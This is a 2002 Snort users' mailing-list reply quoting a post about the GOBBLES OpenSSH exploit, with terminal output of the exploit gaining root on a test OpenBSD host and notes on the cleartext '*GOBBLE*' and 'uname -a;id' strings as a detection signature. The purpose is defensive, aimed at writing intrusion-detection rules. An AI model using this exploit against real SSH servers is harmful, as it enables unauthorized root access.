RE: GOBBLES' OpenSSH exploit.

[Kevin Brown <Kevin.M.Brown () asu edu>]

 Is this one of the vulnerabilities that is closed by upgrading to 3.4 or
getting patches from the vendor (e.g. Red Hat)?

-----Original Message-----
From: Andreas Östling
To: snort-users () lists sourceforge net
Cc: snort-sigs () lists sourceforge net
Sent: 7/1/02 2:20 PM
Subject: [Snort-users] GOBBLES' OpenSSH exploit.


Hello,

I guess most people have seen the OpenSSH exploit that GOBBLES
just published ("sshutuptheo"). It obviously works very well (no, I
didn't
care to check it for backdoors and I'm doing this on offline machines :)
)

[foo@192.168.1.3 openssh-3.4p1]$ nc 192.168.1.1 22
SSH-1.99-OpenSSH_3.2

(./ssh is modified with GOBBLES' patch)

[foo@192.168.1.3 openssh-3.4p1]$ ./ssh -l root 192.168.1.1
[*] remote host supports ssh2
[*] server_user: root:skey
[*] keyboard-interactive method available
[*] chunk_size: 4096 tcode_rep: 0 scode_rep 60
[*] mode: exploitation
*GOBBLE*
OpenBSD openbsd 3.1 GENERIC#59 i386
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty),
5(operator), 20(staff), 31(guest)


It seems impossible (or at least hard?) to catch the actual exploit
using
only content matching. However, this particular exploit (at least in its
default mode), when successful, opens up a cleartext channel. The string
"*GOBBLE*" will be echoed back to the attacker who then sends the
"uname -a;id" string.

<Snipped>